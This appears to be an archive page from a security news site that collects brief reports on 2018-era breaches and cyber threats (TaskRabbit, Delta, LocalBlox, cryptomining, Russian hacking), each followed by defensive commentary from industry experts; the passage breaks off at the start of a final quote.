Author Archives: Security Experts

More Than 80 UK Manufacturing Plants Hit By Cyber Attacks

The ISBuzz Post: This Post More Than 80 UK Manufacturing Plants Hit By Cyber Attacks appeared first on Information Security Buzz.

The UK has already suffered stealth cyber attacks on more than 80 manufacturing plants, with criminals deploying tactics that could put critical national infrastructure at risk. In an anonymous survey of manufacturers, almost half admitted that they have fallen prey to cyber warfare, according to trade group EEF. IT security experts commented below.

Tim Erlin, VP at Tripwire:

“It’s important to distinguish between cyberattacks on manufacturers and cyberattacks on industrial control systems. While they may be related, they’re not the same thing. Any organization with connected computer systems may fall victim to cyberattacks across a broad spectrum of technologies, but attacks on the systems that control a manufacturing plant floor are much more specific. Of course, manufacturing isn’t the only industry using industrial control systems.

We have seen a rise in attack on control systems themselves, and the impact to the business of these attacks can be very direct. At the same time, cyberattacks in general continue to plague organizations around the globe.”

David Emm, Principal Security Researcher at Kaspersky Lab:

“The world isn’t ready for cyber-attacks against critical infrastructure, but attackers are clearly ready and able to launch attacks on these facilities – as this trend towards attacks on the manufacturing sector shows.

We’ve seen attacks on power grids, oil refineries, steel plants, financial infrastructure, seaports and hospitals – cases where organisations have spotted attacks and acknowledged them. However, many more companies do neither, and the lack of reporting of these attacks hampers risk assessment and response to the threat. Security must be tailored to the specific needs of each organisation and be seen as an ongoing process. This is true also of the human dimension – tricking people into taking action that launches the initial exploit is as common in attacks on such facilities as it is in any other attack.”

The ISBuzz Post: This Post More Than 80 UK Manufacturing Plants Hit By Cyber Attacks appeared first on Information Security Buzz.

Data Firm Left 48 Million Data Profiles Exposed On AWS Server

The ISBuzz Post: This Post Data Firm Left 48 Million Data Profiles Exposed On AWS Server appeared first on Information Security Buzz.

LocalBlox, a company that scrapes data from public web profiles, has left the details of over 48 million users on a publicly accessible Amazon Web Services (AWS) S3 bucket. IT security experts commented below.

Christopher Littlejohns, EMEA Engineer at Synopsys:

“Whilst this data breach has strong similarities to multiple other AWS misconfiguration issues that resulted in data breaches, and the data was “publicly available”, the data captured was interesting in that it consolidated personal information scraped from thousands of web sites. The net result is that it made it easy for an attacker to gain access to a pool of data that would be valuable for subsequent social engineering attacks, account hacking and identity fraud. Any company that collects, consolidates, but does not adequately secure such data is essentially exposing people to higher risk of being targeted. They therefore have an even stronger duty of care as they are effectively creating developed intelligence on people that can be used for criminal purposes.”

Javvad Malik, Security Advocate at AlienVault:

Javvad Malik“Massive breaches through unsecured AWS S3 buckets continues to be a troubling trend. While cloud providers take care of certain aspects of security, it is imperative that organisations ensure they are doing their part to ensure the security of data that is uploaded. As with other aspects of security, cloud environments need to be continually monitored and the security assessed. Otherwise organizations have no assurance as to whether the data is secure or not, and can be left exposed for long periods of time.”

The ISBuzz Post: This Post Data Firm Left 48 Million Data Profiles Exposed On AWS Server appeared first on Information Security Buzz.

TaskRabbit Takes Down App And Website After Getting Hacked

The ISBuzz Post: This Post TaskRabbit Takes Down App And Website After Getting Hacked appeared first on Information Security Buzz.

TaskRabbit, a web-based service that connects freelance handymen with clients in various local US markets, has emailed customers admitting it suffered a security breach. The company has taken down its app and website while law enforcement and a private cyber-security firm are investigating the incident. IT security experts commented below.

Tim Helming, Director of Product Management at DomainTools: 

“This is an indication of how comprehensively nefarious actors can interfere with business functions–and potentially harm users. To take control of a website and expose such trusted resources as TaskRabbit’s GitHub repository, as well as daily transaction volumes and information regarding employees, the threat actors must have had comprehensive access to the network. While we don’t yet know the specifics of how this attack unfolded, it is a good reminder of the importance of practices such as least-privilege access controls, robust network segmentation, and strong phishing controls. Organizations need to take cybersecurity seriously, particularly when it could affect the livelihood, reputation and privacy of both employees and service users.

Bob Egner, VP at Outpost 24:

“This attack happened because the TaskRabbit data is an interesting and valuable asset.  Attacks of this nature are attempted when there is a potential gain for the attacker in this case, to monitize any personal information that can be obtained.  All web applications are vulnerable, it’s only a matter of how much effort the attacker is required to expend.  It’s really an economic problem where the payback has to be larger than the expended effort.

Any public facing web application that holds large amounts of personal information should have a comprehensive application security testing program in place to assess the application, it’s data stores, the infrastructure on which it runs, and the users assigned to manage and operate the overall system.  Any weaknesses should be remediated in a prioritized way so that the potential for attack is reduced to the lowest possible level and maintained there.  The focus should be on the economic equation, where the effort required to compromise the system is much greater than the value of any stolen information.”

Paul Edon, Director at Tripwire:

The TaskRabbit hack is an unfortunate reminder of why phishing is a popular attack method as it targets human naivety. Individuals must show extreme caution to all links and attachments sent to them and have the mindset that if it looks too good to be true, then avoid it at all costs. Organisations also have a role to play in reducing the threat posed by such attacks. Take a proactive step by implementing security services that offer anti-phishing services as well as introduce training for employees to understand the consequences of clicking unknown emails. Hackers are constantly developing new tricks to dupe unsuspecting users, so organisations must adopt a pro-active stance to help reduce the threat.

Rob Tate, Security Researcher at WhiteHat Security:

“TaskRabbit is a great example of how small businesses can thrive thanks to the popularity and widespread use of apps in today’s modern world, and consumers can find services in just a few clicks. To stay ahead of the game in terms of usability and enhanced features, apps are continuously being updated. Although this is beneficial to both businesses and consumers, security must not be an afterthought and needs to be an integral part of the build process.

At WhiteHat, we are seeing practices such as DevSecOps become increasingly popular as organizations and businesses of all sizes look to focus efforts on securing their applications, but a lot more still needs to be done to achieve the security required. Because a security breach could reflect poorly on the acquiring company, there are key areas that could make your organization vulnerable to a breach, and they are often overlooked.

For example, it’s critical that the company being acquired take the proper measures to build security into their development practice, and that due diligence on the security of acquisitions of big software programs or cloud services be done. The same holds true for open source software or libraries that are being brought into your company’s development organization.

Companies should always first assume the service/application is not secure, and then apply security best practices to make sure it becomes secure as they use it to build apps or services.

Security is also important for consumers. There are some simple steps they can take to help secure themselves online:

  1. Don’t use the same password for all sites and apps. If one site or app is breached, all of your accounts are effectively breached. At the very least, use a variety of passwords to minimize the impact.
  2. Turn on two-factor authentication for any app that supports it. It can be a pain, yes, but it’s also one of the best ways to protect your accounts,”

The ISBuzz Post: This Post TaskRabbit Takes Down App And Website After Getting Hacked appeared first on Information Security Buzz.

Russian Cyber Threat

The ISBuzz Post: This Post Russian Cyber Threat appeared first on Information Security Buzz.

Days after the missile strike on Syria, GCHQ and the FBI have warned of a potential retaliation by Russia– in the form of a cyber attack. The NCSC is on high alert and concern is growing among executives who fear severe disruption of critical infrastructure. IT security experts commented below.

Bill Conner, CEO at SonicWall:

“Cyber attacks like WannaCry and Not-Petya demonstrate governments can and will, use nefarious means to target critical national infrastructure of nation states. There is no doubt that Russia has the ability and the motive to deploy this kind of attack on the West. Many other nation states have this ability too. That said, it is not just national infrastructure at risk. For many state-sponsored hackers, business and governmental department disruption is top of the agenda, much like the NHS attack.”

“As the cyber-arms race continues to escalate, there is increasing pressure on the US and UK governments to truly understand the nature of malware cocktails – the process of mixing threats to concoct brand new, destructive attacks. The risks to businesses and even everyday citizen’s data grow each day. Governments and businesses need to deploy a layered security approach utilizing next generation firewalls, deep packet inspection for encrypted communication, cloud-based multi-engine cloud sandboxing, advanced real-time deep memory inspection, and next generation end-point security with rollback capability.”

Matt Walmsley, EMEA Director at Vectra:

“With stories reporting routers in the USA and UK being compromised by foreign nation states, and a recent increase in security preparation for possible large scale cyber-attacks, enterprises should take another look at how they’re securing their network infrastructure.

Don’t leave the door wide open – No software is perfect so make sure you’re up-to-date with software updates and patches for your network infrastructure. Then make sure you’re not exposing your equipment’s management interfaces and ensure you have changed the default admin credentials. For perimeter devices with internet connectivity this is doubly important.  This may seem like “cybersecurity 101” advice but, only last month, default settings in some Cisco switches allowed over 168,000 devices exposed to the internet to be identified as vulnerable to illicit remote command execution via an admin protocol.

Your firmware may not be that firm – Advance attackers will seek to compromise the underlying firmware of their target platform. Even if you have robust OS level security controls, threats such as Sub-OS rootkits will remain undetected. However, with recent advances in AI-based behaviour threat detection we can now spot in real-time the very subtle signals attackers use to perform command & control (C2) orchestration to devices that have compromised firmware by looking for the attacker’s “knocking” signals hidden within legitimate communications.  With that actionable insight, platforms can be completely reset and their firmware, OS images, and configs reloaded from known good sources.”

The ISBuzz Post: This Post Russian Cyber Threat appeared first on Information Security Buzz.

‘Lazy Hackers’ Turn To Automated Attack Tools

The ISBuzz Post: This Post ‘Lazy Hackers’ Turn To Automated Attack Tools appeared first on Information Security Buzz.

The BBC today ran a story covering how cyber-attackers are now turning to tools that automate the process of finding and hijacking vulnerable servers.The study used a fake server known as a honeypot to log everything done to it by digital intruders. Put online by security firm Cybereason, the server was quickly found and hijacked in seconds by a bot that broke through its digital defences.

To make the fake server look more convincing, Cybereason thought up a company name, generated staff identities and spoofed network traffic. This helped it pass the “sniff test” and convince bots it was a target that was worth their attention. About two hours after the server for the fake finance firm was put online it was found by a bot which then aggressively set about taking it over. Passwords to protect some of the server’s functions were left intentionally weak to tempt the bot which duly cracked them and then went on to plunder information on the machine. IT security experts commented below.

Oliver Pinson-Roxburgh, EMEA Director at Alert Logic:

“Alert Logic did some research on autosploit, a new tool that automatically looks for assets to hack on the internet, and then automatically hacks the systems. Our research was to see if this new tool generated interest in the hacker community. We would have expected to see an increase in attacks against our customers generally due to its release, and while we haven’t quantified what impact this might have had, we have at least a supposition that it would increase attacks.

I am not surprised that organisations are starting to see this behaviour It’s likely due to attackers using miners more and more as a way to monetise attacks. We see the miner malware automatically looking to identify other miners in the environment and shut the current hackers down in order to spin up their own systems. They are also looking to stay persistent for as long as possible in an asset, as controls on the cryptocurrency side starts to improve ways to detect what a valid miner looks like.”

Sammy Migues, Principal Scientist at Synopsys:

 “In my day, a “hacker” was someone who would spend two hours coding up some elegant script so that they wouldn’t ever have to do 10 minutes of tedious labour ever again. Even though “hacker” is “attacker” now, the mindset hasn’t changed. Only a person incapable of actual hacking (such as writing clever scripts) would ever do all those steps manually and that person is probably not an attacker to be feared.

In theory, time is on the organisation’s side and their brilliant and comprehensive logging and attack management would catch the breach by the second or third step. When it’s automated, the entire attack might occur within the window that their logging and SIEM can turn data into knowledge into calls to action.

If your electronic “attack surface” has one or more vulnerabilities that are known long enough for someone to string together multiple exploits into one bot that still works, then you’ve made an error in how you prioritize repairs, or in asset management, or something like that.

So, yes, someone “weaponised” a set of attacks into something a great many less capable “attackers” can use. Hello, 1988 called and they want their Morris Worm back. Zero-days aside, by the time this happens, you probably should have patched. Considering the chain of exploits required here (for this purposely vulnerable honeypot), when that exists for real, it’s almost always because someone isn’t keeping up with the risk management, which would drive their patching, firewalling, WAFing, and so on. This is not victim blaming. There’s a reason why we inspect cars and keep the unsafe ones off the road…haven’t quite figured out how to do that with a lot drivers, however.

So, why do attackers lick their chops and run their bots? Because they can…”

Kelvin Murray, Senior Threat Research Analyst at Webroo

“Hackers always look at the latest technology. Automation technologies are changing the game for attackers, allowing them to mount more complex and sophisticated attacks at scale in seconds. Although it will take many years before hackers employ powerful AI to inflict damage upon systems and services autonomously, smart programming and even machine learning can be more readily weaponised in the medium term. These attackers appear to have successfully removed the human labour required to complete a successful breach, using a bot to identify and attack a decoy – which is worrying news.

“Cyber criminals largely operate a numbers game. More attempts to access data or capture information fundamentally translates to an increased likelihood of successfully making money. It really is no surprise that the more tedious aspects of stealing from a business have been automated. Completely taking over a business without secured RDP is very easy to do and to implement this in code wouldn’t be tough. We recommend securing your endpoints against RDP breaches immediately. Proper password policy is of course something that would also protect against these kind of attacks. A combination of an intelligent approach to security and the latest defence technologies will help organisations stay one step ahead of the bad guys – even if they are automating their attacks.”

The ISBuzz Post: This Post ‘Lazy Hackers’ Turn To Automated Attack Tools appeared first on Information Security Buzz.

Threat Of Russian Cyber Attack

The ISBuzz Post: This Post Threat Of Russian Cyber Attack appeared first on Information Security Buzz.

Russian hackers are targeting millions of devices around the world to spy, steal information and build networks for potentially devastating future cyberattacks. IT security experts commented below.

Gavin Millard, Technical Director at Tenable:

“Irrelevant of who the threat actors are or their motivations, the existence of an easily exploited vulnerability on critical infrastructure connected to the internet should be addressed immediately. As stated in the technical alert, if a threat actor can gain privileged access to a router, the options for further exploitation are endless.

“It’s important to note, even though the recently disclosed Cisco Smart Install vulnerability doesn’t affect routers, unfortunately there are over 100,000 switches that could be vulnerable currently exposed to the internet. Similar to MS17-10, the vulnerability in SMBv1 leveraged for the global Wannacry attack, these flaws affect protocols that should never be exposed to the internet but frequently are due to a lack of basic security hygiene.

“Owners and operators of MOXA EDR-810 industrial routers, frequently deployed to secure highly critical environments, should take particular note of this advisory as a slew of recently disclosed vulnerabilities could lead to many of the issues outlined.

“The guide from the joint task force includes some good best practices that should be enforced to reduce the chance of a router falling under the control of an attacker, irrelevant of their country of origin or motivation. Continuous visibility of what corporate systems are exposed to the internet, how well they are configured against security best practices (CIS or NIST for example), and whether they are affected by any known vulnerabilities should be part of every robust security program.”

Anthony Chadd, Senior Director, EMEA at Neustar:

“Today’s warnings regarding the Russian hacking offensive, which highlight the probability of Kremlin-backed cyber-experts sitting invisibly on networks with the hope of collecting information, should come as no surprise.

“We are already aware that the Russians are armed with the vast capabilities, resources and motives to steal classified information from governments, and are able to unleash disruption to key industries globally. But today’s news highlights the increasing intensity of the Russian offensive, as it has been revealed that Kremlin cyber-experts have been proactively targeting routers in British homes, scanning for weaknesses such as obvious passwords and expired anti-virus software.

“With such an obvious imposition on US and UK security, it is of the greatest importance that the push for key industries to strengthen their cyber-defences are put in place – fast. This includes deploying efficient technologies and ensuring key processes are up to scratch. However, these marching orders should not just apply to the government, but also society as whole. Every citizen should be proactive in their own cyber-defence, but US and UK governments must make educating the general public a priority, reinforcing the necessity for effective usernames and passwords to prevent their data getting into the wrong hands.

“Beyond that, in order to be proactive in their cyber defences, both citizens and businesses should be aware of the importance of securing any IoT technologies, which is considered to be a crucial first point of defence. This involves ensuring that the proper procedures are in place and that anti-virus software in every device is updated frequently.”

Ross Rustici, Senior Director of Intelligence Services at Cybereason:

“Although tensions with Russia are at an all-time high, the threat of retaliatory cyber-attacks against the UK and its allies is overblown.

“We are likely to see increased disinformation campaigns and some low-level activity by apparently independent groups, but nothing that breaks Russia’s usual plausible deniability. We may also see some cyber activity within the Syrian theatre, such as jamming communications, but nothing which targets nations directly.

An unconcealed, high-level attack on UK infrastructure such as a powerplant would cross a red line into open warfare. Russia’s failure to interfere with the airstrike itself indicates that Putin is not yet ready to escalate and risk a war breaking out. Nobody wants to see these nuclear powers go toe-to-toe in a real conflict.”

The ISBuzz Post: This Post Threat Of Russian Cyber Attack appeared first on Information Security Buzz.

Crypto-Mining Corporate Networks

The ISBuzz Post: This Post Crypto-Mining Corporate Networks appeared first on Information Security Buzz.

The volume of crypto-mining transactions has grown, spiking almost 500% on corporate networks. Zscaler has blocked more than 2.5 billion crypto-mining attempts in the last six months. The spike, the firm said, is likely tied to the sharp increase in value of cryptocurrency (Bitcoin hit highs above $19,000 in December) and the fact that legitimate sites are adopting crypto-mining as a source of revenue instead of online advertisements. IT security experts commented below.

Itsik Mantin, Lead Scientist at Imperva:

“The impact of the crypto-madness on cybersecurity has two faces. The first is specific to the crypto-finance industry, which turned into a very tempting target for penetration, wallet hijacking and fake transactions. However, the impact of the second – using hijacked hosts of all kinds as platforms for crypto-mining – reaches practically everywhere. From web browsers unknowingly mining coins for the site they’re visiting, to websites that suffer code injection attempts due to attackers looking for powerful hosts for digging their gold. The cyber-monetization – the path from hack to money, is shorter today than ever before.”

Bob Noel, Director of Strategic Relationships and Marketing at Plixer:

“Cryptocurrency mining is a theft of CPU resources from the business. Web site response times are critical to customer satisfaction and retention, and companies spend millions of dollars on robust infrastructure to achieve that goal. Cryptocurrency mining steals CPU cycles from that infrastructure, negatively affecting the customer experience, potentially costing the business millions of dollars. It is important that organizations implement mechanisms to know when they have been infected. One way to do that is with software agents looking for unusual processes that consume CPU cycles. Another is to utilize network traffic analysis (NTA). CPU cycles are being used to answer math problems, and for the cybercriminals to monetize this, data must be sent across the internet to their servers. NTA provides a mechanism to scrutinize this traffic, looking for data, even a single packet, being sent to cybercriminal domains. If any of this traffic is seen, an immediate notification is sent to the security operations team alerting them to the crypto-mining in progress. They are able to remove it, and protect the business and more importantly, the customer experience.”

Nadav Avital, Security Researcher at Imperva:

“The latest research we conducted at Imperva, shows a clear bias towards crypto-mining attacks. In fact, 90% off all remote code execution attacks towards servers involve illegal crypto-mining activities. Also, since the reward is immediate, i.e. the money goes straight into the attacker wallet, we have seen a development in crypto-mining attacks – from simple scripts, to state sponsored exploits like eternal blue that are weaponized with crypto-mining payloads.”


Andy Norton, Director of Threat Intelligence at Lastline:

“The spike in traffic has nothing to do with Bitcoin’s value. It has everything to do with Monero, a general CPU friendly fungible currency creating a market for services like Coinhive to be injected onto websites, and usurp visiting browsers to mine XMR currency. The fact is that exploits are much harder to develop these days, so cryptojacking payloads offer a greater return on investment.”

The ISBuzz Post: This Post Crypto-Mining Corporate Networks appeared first on Information Security Buzz.

Ransomware Still A Top Cybersecurity Threat

The ISBuzz Post: This Post Ransomware Still A Top Cybersecurity Threat appeared first on Information Security Buzz.

new report by Verizon revealed that ransomware is the most common type of malware, found in 39 percent of malware-related data breaches – double that of last year’s DBIR – and accounts for over 700 incidents. What’s more, Verizon’s analysis show that attacks are now moving into business critical systems, which encrypt file servers or databases, inflicting more damage and commanding bigger ransom requests. IT security experts commented below.

Chris Day, Chief Cybersecurity Officer at Cyxtera:

“Cybercrime is profitable and hard to prosecute. Potential pay-outs can reach millions of dollars yet criminals operate in near anonymity. Even if a cybercriminal is prosecuted, which is rare, extradition is even less common. For criminally-minded groups, there is far less chance of getting ‘caught’ in the cyber realm and then in traditional criminal pursuits.

“Ransomware attacks will likely continue to plague us for some time because they require little effort. Cyber criminals only need access to pedestrian tools to carry out an attack. Cryptomining, on the other hand, requires enormous amounts of expensive compute power to pull off. That’s why we see rising numbers of attacks where the target is processing power. “

Ricardo Villadiego, CEO at Cyxtera Business:

“The reason why we are seeing more phishing than ever before is simple: they still work very well. Because they appeal to the curiosity of the human, using clever social engineer tactics, they are still very successful. In addition, attackers use more advanced techniques, making it harder for humans to spot the attacks, which is why security standards like DMARC, can make a big difference.

“Organizations will not be able to mitigate phishing attacks if they focus on fraud losses exclusively. Their protection strategy needs to be comprehensive in nature and phishing is the beginning of many fraud schemes and data breaches. Fraud losses are the consequence. As we work with more than 3,500 organizations around the world, we see that relentless and comprehensive monitoring of internet threats becomes very effective. You don’t need to make it impossible for cybercriminals to impersonate you – just expensive, inefficient and unprofitable, as they normally go for easy targets. “

Sean Newman, Director at Corero Network Security: 

“Whilst other vendors offer different perspectives on the DDoS threat landscape, Verizon’s most recent Data Breach Investigation Report closely aligns with what we are seeing at Corero – DDoS attacks are not diminishing in quantity and they are not generally as large as most might expect.  However, they are equally as damaging!

“Although DDoS is not in the news every day, Verizon reported 21,409 attacks over the past year – almost 60 a day. Corero DDoS research, looking at a larger sample size of more than 100,000 attacks per year, observed similar patterns. In fact, many attacks are now coming from cybercriminals who are financially motivated. Therefore, it’s no surprise that most attacks are reported against the Finance, Insurance and Retail industries. For online companies where it is critical to have 100% uptime, DDoS technology which can detect and automatically mitigate attacks, in real-time, should now be a must-have requirement.”

The ISBuzz Post: This Post Ransomware Still A Top Cybersecurity Threat appeared first on Information Security Buzz.

Government Launches New Cybersecurity Centre At London’s Olympic Park

The ISBuzz Post: This Post Government Launches New Cybersecurity Centre At London’s Olympic Park appeared first on Information Security Buzz.

Following news that the Government are launching a new cybersecurity centre at London’s Olympic park. They hope the new centre will be a catalyst for growing tech cluster and could help create 2,000 UK jobs in cybersecurity. IT security experts commented below.

Paul Farrington, Director, EMEA Solution Architects at CA Veracode:

“We are pleased to see the Government continuing to invest in cybersecurity skills in the UK. With news today that cyberattacks against UK organisations are at an all-time high, the need for greater expertise will be crucial in securing the nation’s data and services. However, it is important that industry doesn’t see the cyber skills gap as the Government’s problem to solve – especially as we see security becoming an increasingly prominent part of other technology roles.

In software development, for example, in 44% of organisations, the development team are responsible for the maintenance of third-party commercial and open source components. This suggests a move in responsibility for the ongoing management of security vulnerabilities, such as the Apache Struts2 vulnerability that lead to the Equifax mega-breach.  Even as we’re seeing this shift, our research has also shown that 70% of developers were not required to complete any courses focused on security when getting their degree. It is crucial that organisations invest in improving the skills of their employees to assure their security of their services and solutions. Providing eLearning can improve security standards by an average of 19%, for example. Improving the nation’s cyber hygiene is a collaborative effort, and those companies that rely solely on the Government’s investment will find themselves burnt.”

Neil Thacker, CISO EMEA at Netskope:

“This move from the British government shines a spotlight on the dangers of the digital underworld today.  Cracking down on the dark web is the right step forward, however criminals are smart and the dark web is not the only hiding ground for them.  There are many access points and techniques used by criminals to conceal their activities, including the public web, where stolen personal data and financial information can be traded.  Policy will help to some extent, but the onus is on businesses and individuals to look at their practices and implement intelligent controls that can lead to identifying these illegal activities.”

André Stewart, VP EMEA at Netskope:

“Cybersecurity is big business and as we all now know it can have huge consequences, which is why cyber criminals and governments take it so seriously. While it’s great to see cybersecurity is front of mind, the amount of investment is a bit like buying a spud gun to battle a bazooka. Much more needs to be done as businesses continue to fall short of the mark in protecting themselves, often rooted in legacy and traditional security practices that fail to fully protect them and their data. The announcement of this new cyber-innovation centre should spur businesses into reviewing their practices and cybersecurity resources, stripping away antiquated practices and making sure they are up to the challenges and the risks of today’s digital world.”

The ISBuzz Post: This Post Government Launches New Cybersecurity Centre At London’s Olympic Park appeared first on Information Security Buzz.

YouTube Hacked

The ISBuzz Post: This Post YouTube Hacked appeared first on Information Security Buzz.

It has been reported that popular streaming service YouTube has been hacked. More than a dozen other artists, including Shakira, Selena Gomez, Drake and Taylor Swift are also affected. The original clips had been posted by Vevo. Despacito has been removed, but its cover image had shown a group of people wearing masks and pointing guns. The hackers, calling themselves Prosox and Kuroi’sh, had written “Free Palestine” underneath the videos. Several of the clips remain live at time of writing. IT security experts commented below.

Mark James, Security Specialist at ESET:

“The details currently are sparse so trying to figure out what they did or how they did it is not something that’s easily done. The problem with these types of hacks is the potential for damage caused. For YouTube it’s a brand and PR issue.  For the artists it’s the personal damage of their brand being used for nefarious purposes.

Some YouTube videos collect hundreds of thousands or indeed millions of views. The ability to push information to all those viewers is massive and in some cases we could even see actions to trick the user into going to websites or following link.

For the end user it’s about having the security measures in place in case you are involved in a phishing attack or online scam. Utilising a good multi-layered internet security product and applying awareness when browsing web pages or clicking any links associated with the internet. The end user may be influenced by the information they see, if they trust the digital persona like a pop star or “Youtuber” they may be more likely to be scammed or tricked into going somewhere that may be malicious.”

Lee Munson, Security Researcher at Comparitech:

“The recent hack of popular music clips on YouTube seems to be relatively benign in nature, featuring a fairly tame political message and motivated by the ‘fun’ of the challenge.

In that respect then, it is in itself, nothing much to worry about for the video hosting site, though it does suggest that the defacement of videos is not technically difficult to achieve, given the number of high profile artists that have been targeted.

What exactly YouTube is doing to prevent content like this appearing via Vevo is unclear but it will be interesting to see whether other hacktivists jump on the bandwagon and use such sites to make their points in the future.”

The ISBuzz Post: This Post YouTube Hacked appeared first on Information Security Buzz.

Delta Cyberattack Exposes Customer Credit Card Details

The ISBuzz Post: This Post Delta Cyberattack Exposes Customer Credit Card Details appeared first on Information Security Buzz.

It has been revealed that the cyberattack the American airline Delta suffered last year may have exposed customer payment information. The airline said the incident involved (24), a chat-services provider used by Delta and other companies. Delta says only “a small subset” of customers were affected, with payment information exposed from Sept. 26 to Oct. Security experts commented below.

Martin Jartelius, CSO at Outpost24:

How should Delta handle to breach?

As this relates to a PCI certified environment, the task of foresic investigations is with the card brands. The important part now is to handle the customer relations with transparency, and also to review the trusts between their own organization and their service providers.

As there is a known period the breach occurred, it is of course of importance to find out how it was possible for it to occur and how to prevent it from recurring.

What should customers do?

The breach occurred last year and remain undetected until a week ago. Customers should always be attentive to their card transactions. Depending on the maturity of security delivered by issuing banks, it is for example possible to block cards for card-not-present transactions without further authorization from the cardholder – however this does not hold true for all banks of geographical regions. As a customer, demand to be either be protected from damage, or provided adequate technical protection by your card issuer.

Do you have any comments around the payment platform that exposed the details?

Delta, as any other organization hosting web content, must consider that any instance when logic flows from one application to another, there is a transfer of trust – trust you have with your clients which is based on your brand and your relationship with your customers. This breach had its primary incident not with Delta, but with their partner – Yet it is stated as an issue affecting Delta. This is the reason understanding your entire digital eco-system ranging from outsourced processes to “cross domain” included scripts, including ad-networks, allows someone else to interact with your customers based on the trust those invest in you. And that also means, a good part of the negative impact of a breach with a partner will reflect back on that trust.

One should also note that this is a certified organization which have been through reviews and testing – Security is a continuous process, and compliance is not a guarantee of security. As long as banks hold their clients damage free, we can accept the current level of security. If consumers are to shoulder the costs or responsibility, much is still to be done regarding rather basic security in the payment card industry.

Craig Young, Computer Security Researcher at Tripwire:

“There are some interesting questions to ask in response to this disclosure. Why was the breach window so short? Were the attackers discovered and booted back in October? If so, why is it that we are only learning of the breach nearly six months later? If not, how can (24) be so confident of the scope of the breach? Were payment card providers notified sooner? Time is a critical factor for preventing fraud whenever there is a breach of financial data. Delta has assured customers that they won’t be held responsible for fraudulent charges but it seems likely that if fraudulent charges related to this have not already been identified, there is little hope that they will ever be connected to this breach.”

Lee Munson, Security Researcher at

“The cyberattack experienced by Delta highlights the many different facets of a data breach, from the good to the bad, as well as the unknown.

Obviously the big negative here is the fact that customers have potentially had their payment card data swiped, though the unknown factor is whether or not that information was encrypted, or how.

From an incident response point of view, it is a shame to learn to the attack has only now come to light, having occurred and been spotted last year, though we are, of course, unaware of when affected customers were notified.

On a more positive note, no personal information was stolen and Delta was quick to examine the breach and learn lessons from it.

We can only hope that affected customers have been offered appropriate support and advice and are now changing passwords where appropriate and examining credit reports with a keen eye.”

Satya Gupta, Co-Founder and Chief Technology Officer at Virsec:

“Once again, another breach raises troubling questions about why current security defenses are failing, and why organizations are dragging their feet with public breach notification. The company says it was notified in mid-March, yet the breach occurred six months earlier and was “quickly resolved.” Whether it’s a company or sub-contractor, the first impulse when a breach is discovered seems to be stalling and hoping it will not go public.

More broadly, we continue to rely on an outdated security model – protecting a porous perimeter, while hackers are often already inside, waiting to exploit vulnerabilities that may dwell for months. The focus has to shift to directly protecting applications and critical data – not relying on perimeter protection which is rapidly disappearing.”

Nick Bilogorskiy, Cybersecurity Strategist at Juniper Networks:

“Delta Air was not directly breached, it was affected by a third-party vendor breach. We saw this vector in play earlier this week with the Energy Transfer Partners third-party EDI breach.

It is no longer enough for large companies to only protect their own networks and internal systems from malware. Nowadays, business is conducted with the help of third-party service companies that provide savings by solving a piece of the puzzle for big companies, like online transaction support, for instance. In such cases, the third-party vendor increases the attack surface and the risk of a cybersecurity breach for the enterprise.

Third parties have been the vector of attack in many high-profile breaches and I anticipate this trend will continue. In recent years, 63 percent of breaches were traced to third-party vendors, according to the Soha System’s survey on third-party risk management. If a hacker can breach a company and pretend to be a legitimate vendor, they may have full access to a company’s network for months; plenty of time to monetize their attack.

A vendor often serves multiple customers, which can create complications and delays in incident response. It is crucial for companies to audit the security posture of their vendor just as rigorously as they do their own.

[24] operates global centers that outsource voice and chat agent services for sales and support, providing a channel of communication between their clients and customers. When such a channel is compromised, it can be quite damaging as the attackers can pose as support or sales managers and ask customers to provide sensitive information.”

Anthony James, Chief Marketing Officer at CipherCloud (San Jose, CA):

“It is an all too frequent headline – another high profile company breached with hundreds of thousands of customers’ personal information or credit card data stolen.  As with the Sears breach announced today, the 3rd party companies are the weakest link in the security chain.  The unfortunate realization that the largest brands are being impacted by their smaller partner companies should inform any organization when they establish their security practices and controls.

The question needs to be asked, who are our partners, what are their security practices, what data are we sharing, and what systems will they have access to?  In this example, [24] – the software service provider for Sears (and many other large retail and airline brands) – became the source for the breach exposing customer credit card data.

With data being the core asset cyber thieves are targeting, new approaches to data protection need to be implemented. There are plenty of new technology approaches to secure data when it is at rest, in flight and in use. These strategies need to be implemented when companies have access to critical customer data.” 

Mounir Hahad, Head of Juniper Threat Labs at Juniper Networks:

“The fact that these two breaches have been discovered in September and March, respectively, means there may be a systemic issue that has been present for at least the past six months within the area of compromise.

It is important to understand that this breach is different from some past breaches, such as Target, where the third-party vendor was a vehicle for an intrusion into the final victim’s own network. In the case of SaaS offerings, a threat actor may not even need to breach your network, siphoning off your data directly from the third-party vendor that you do business with instead. In other words, it is just as important to assess the security posture of a vendor you allow into your network as a vendor you exchange information with to provide you with a service. At the end of the day, it’s companies like Delta Air and Sears that end up in the news, not so much the third-party vendor.”

The ISBuzz Post: This Post Delta Cyberattack Exposes Customer Credit Card Details appeared first on Information Security Buzz.

Facebook Scandal Hit 87 Million Users

The ISBuzz Post: This Post Facebook Scandal Hit 87 Million Users appeared first on Information Security Buzz.

News broke yesterday evening that Facebook now believes that the data of up to 87 million people was improperly shared with Cambridge Analytica – many more than previously disclosed – with around 1.1 million UK-based.

Despite this story being covered by every major media outlet, we are just scratching the surface. Thoughts such as “isn’t this total disrespect for our privacy?!” are now painfully visible and critically accurate. IT security experts commented below.

Evgeny Chereshnev, CEO at Biolink.Tech:

“It doesn’t matter what this data leakage would have proven or not proven. The point is that there was always the opportunity, and possibility, that certain data would be extracted from Facebook by hackers or third party providers that we, the users, were not aware of. It has been said that it’s data taken from Facebook without the users’ consent. This is both true and not true. If you read the licence agreement, when you sign up to Facebook, you would understand that you have absolutely no rights when it comes to your data; your information, what you post and how information is gathered about you. Facebook can analyse and use this data any way it wants.

I am actually very happy this has happened, as it shows just how severe and significant the problem is. Firstly, if there is a database, it only has two states – already hacked or will be hacked – that is simply the fate of all centralised user databases. We have to embrace blockchain and diversified, distributed way of dealing with data.

Secondly, we need to totally rethink the way we approach data – our digital trail and DDNA (digital DNA). Privacy of personal data MUST become a constitutional right that everyone has from birth. Data is there forever, and it should be illegal to take it from users. It goes back to the age old question – what is self? Who owns it and what needs to be co-owned by third parties for self to coexist in the society that we live in? For example, a healthcare system needs access to my vital health records in order to administer the right treatment, but they don’t need to own that data. We should own our own self.

In that sense, the EU is the closest to doing the right thing, but there is always room for improvement, even when GDPR comes into effect.”

Craig Young, Computer Security Researcher at Tripwire:

